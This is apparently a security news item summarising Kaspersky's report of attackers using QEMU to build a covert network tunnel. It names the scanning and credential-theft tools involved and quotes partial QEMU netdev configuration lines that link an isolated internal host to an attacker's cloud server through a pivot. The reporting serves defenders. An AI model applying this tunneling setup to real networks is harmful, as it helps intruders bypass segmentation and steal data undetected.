Security News > 2024 > March > Hackers abuse QEMU to covertly tunnel network traffic in cyberattacks
As part of the attack, threat actors used QEMU to create virtual network interfaces and a socket-type network device to connect to a remote server.
QEMU offers unique capabilities such as emulating a wide range of hardware and virtual networks, allowing malicious activities to blend in with benign virtualization traffic, and bridging segmented network parts through strategically set up VM pivot points.
In the attack seen by Kaspersky, the hackers utilized 'Angry IP Scanner' for network scanning, 'mimikatz' for credential theft, and QEMU for creating a sophisticated network tunneling setup that facilitated a covert communication channel.
Netdev user,id=lan,restrict=off: Configures a network backend named 'lan' in user mode, allowing unrestricted network access through the host's network stack.
Netdev hubport,id=port-lan,hubid=0,netdev=lan/sock: Links a network device to a virtual hub hubid=0, facilitating network connectivity between different backends.
Using QEMU, the attackers established a network tunnel from the targeted internal host that didn't have internet access to a pivot host with internet access, which in turn connects to the attacker's server on the cloud, running a Kali Linux VM. The ability of QEMU VMs to link seamlessly and bridge segmented network components is key in bypassing security measures and may also be used to further the breach laterally.